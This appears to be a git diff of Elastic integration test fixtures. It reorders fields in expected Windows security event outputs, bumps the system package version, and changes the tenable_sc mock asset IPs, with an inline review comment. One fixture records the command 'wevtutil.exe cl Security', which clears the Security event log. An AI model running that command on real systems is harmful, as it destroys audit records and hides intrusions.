+53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.534580700Z", + "ingested": "2021-12-14T14:55:54.923831794Z", "code": "4754", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json index b105ecd48d6..cdb06c18d95 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:09.070Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.xml" - } - }, - "@timestamp": "2019-10-22T11:35:09.070Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.729553600Z", + "ingested": "2021-12-14T14:55:55.130838375Z", "code": "4755", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json index 923556d58fd..526ca907587 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:58.413Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { 
@@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.xml" - } - }, - "@timestamp": "2019-10-22T11:34:58.413Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:01.936912200Z", + "ingested": "2021-12-14T14:55:55.330320969Z", "code": "4756", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json index 9e51f4f2ef9..e0c13e8e22a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:09.070Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.xml" - } - }, - "@timestamp": "2019-10-22T11:35:09.070Z", "ecs": { "version": "1.12.0" }, 
@@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.212799Z", + "ingested": "2021-12-14T14:55:55.593178552Z", "code": "4757", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json index 629aa9d4fd9..5d05f834a79 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:35:13.550Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.xml" - } - }, - "@timestamp": "2019-10-22T11:35:13.550Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.470400500Z", + "ingested": "2021-12-14T14:55:55.858879473Z", "code": "4758", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json index d880de8ee79..e5854b3b265 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:57.271Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -43,13 +44,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.xml" - } - }, - "@timestamp": "2019-10-22T11:33:57.271Z", "ecs": { "version": "1.12.0" }, @@ -58,11 +52,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:02.674299700Z", + "ingested": "2021-12-14T14:55:56.053719148Z", "code": "4764", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json index 70030989636..64878967762 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json 
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:02.863165Z", + "ingested": "2021-12-14T14:55:56.254945951Z", "code": "4767", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json index d36f2e08438..9ee07f78aff 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.085219100Z", + "ingested": "2021-12-14T14:55:56.478572199Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -156,7 +156,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.085223200Z", + "ingested": "2021-12-14T14:55:56.478575082Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json index ed2647237a8..1d19d8b9b10 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json 
@@ -64,7 +64,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.473678500Z", + "ingested": "2021-12-14T14:55:56.871480572Z", "code": "4798", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json index 684f24c0a0b..5c1bb72ace2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-08T10:20:44.472Z", "winlog": { "computer_name": "WIN-41OB2LO92CR", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.xml" - } - }, - "@timestamp": "2019-10-08T10:20:44.472Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "WIN-41OB2LO92CR$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.692317800Z", + "ingested": "2021-12-14T14:55:57.092273189Z", "code": "4799", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json index bab7d156087..81dfee19ad3 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.893129100Z", + "ingested": "2021-12-14T14:55:57.288953779Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -137,7 +137,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.893134600Z", + "ingested": "2021-12-14T14:55:57.288956364Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json index abedc3063b1..a80d10d7f86 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json @@ -23,6 +23,7 @@ "executable": "C:\\Windows\\System32\\wevtutil.exe", "command_line": "\"C:\\Windows\\system32\\wevtutil.exe\" cl Security" }, + "@timestamp": "2019-11-14T17:10:15.151Z", "winlog": { "computer_name": "vagrant", "process": { @@ -62,13 +63,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4688_Process_Created.xml" - } - }, - "@timestamp": "2019-11-14T17:10:15.151Z", "ecs": { "version": "1.12.0" }, 
@@ -77,11 +71,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4688_Process_Created.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.226615400Z", + "ingested": "2021-12-14T14:55:57.625471463Z", "code": "4688", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json index cb2b04519a1..7945d4144b4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json @@ -13,6 +13,7 @@ "pid": 5412, "executable": "C:\\Windows\\System32\\wevtutil.exe" }, + "@timestamp": "2019-11-14T21:26:49.496Z", "winlog": { "computer_name": "vagrant", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:26:49.496Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468666400Z", + "ingested": "2021-12-14T14:55:57.873260196Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
@@ -95,6 +95,7 @@ "pid": 3988, "executable": "C:\\Windows\\System32\\taskhostw.exe" }, + "@timestamp": "2019-11-14T21:27:46.960Z", "winlog": { "computer_name": "vagrant", "process": { @@ -126,13 +127,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:27:46.960Z", "ecs": { "version": "1.12.0" }, @@ -141,11 +135,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468674800Z", + "ingested": "2021-12-14T14:55:57.873283650Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -177,6 +177,7 @@ "pid": 2760, "executable": "C:\\Windows\\System32\\wevtutil.exe" }, + "@timestamp": "2019-11-14T21:28:18.460Z", "winlog": { "computer_name": "vagrant", "process": { @@ -208,13 +209,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:28:18.460Z", "ecs": { "version": "1.12.0" }, 
@@ -223,11 +217,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468680700Z", + "ingested": "2021-12-14T14:55:57.873284179Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json index 496acdd0433..748e2a9da7a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json @@ -24,7 +24,7 @@ "level": "information" }, "event": { - "ingested": "2021-12-09T13:46:04.990550600Z", + "ingested": "2021-12-14T14:55:58.391586406Z", "code": "65536", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml index e74f1bc8d87..1a6cc171d49 100644 --- a/packages/system/manifest.yml +++ b/packages/system/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: system title: System -version: 1.6.5 +version: 1.6.6 license: basic description: Collect system logs and metrics from your servers with Elastic Agent. type: integration diff --git a/packages/tenable_sc/_dev/deploy/docker/files/config.yml b/packages/tenable_sc/_dev/deploy/docker/files/config.yml index 583727a82ec..08bfd295782 100644 --- a/packages/tenable_sc/_dev/deploy/docker/files/config.yml +++ b/packages/tenable_sc/_dev/deploy/docker/files/config.yml 
@@ -30,4 +30,4 @@ rules: responses: - status_code: 200 body: |- - {"type":"regular","response":{"totalRecords":"3","returnedRecords":3,"matchingDataElementCount":"15331999:613202:409055:920153:21:13389568:31379110","results":[{"ip":"0.0.228.153","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"0.1.103.207","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"0.1.119.220","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent 
Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}}]},"error_code":0,"error_msg":"","warnings":[],"timestamp":1634560288} + {"type":"regular","response":{"totalRecords":"3","returnedRecords":3,"matchingDataElementCount":"15331999:613202:409055:920153:21:13389568:31379110","results":[{"ip":"89.160.20.156","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"89.160.20.156","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent 
Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"89.160.20.156","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}}]},"error_code":0,"error_msg":"","warnings":[],"timestamp":1634560288} diff --git a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log index dc9e57f21f4..72445492dfc 100644 --- a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log +++ b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log 
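Review bot: All three mock results in the replaced `body` line now carry the same `ip` value `89.160.20.156`, where the old line gave each record its own address; since each record declares `"hostUniqueness":"repositoryID,ip,dnsName"`, the fixture no longer exercises the `ip` component of that key, and a pipeline regression that copied one record's address onto the others would go unnoticed (only `uuid`, `macAddress`, `netbiosName` and `dnsName` still distinguish them). The new address is presumably chosen so geo enrichment yields a deterministic result in pipeline tests; if that is the goal, a distinct address per record from the same test range would keep both properties. The identical substitution appears in the test-asset.log hunk that follows, whose end lies outside this chunk.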
@@ -1,3 +1,3 @@ -{"ip":"0.0.228.153","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} -{"ip":"0.1.103.207","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example.com","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} -{"ip":"0.1.119.220","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent 
Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example.co.in","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} \ No newline at end of file +{"ip":"89.160.20.156","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} +{"ip":"89.160.20.156","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example.com","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} 
+{"ip":"89.160.20.156","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example.co.in","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} \ No newline at end of file diff --git a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json index 4e4af8cb7ae..d3063cc500e 100644 --- a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json +++ b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json @@ -11,7 +11,7 @@ "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] 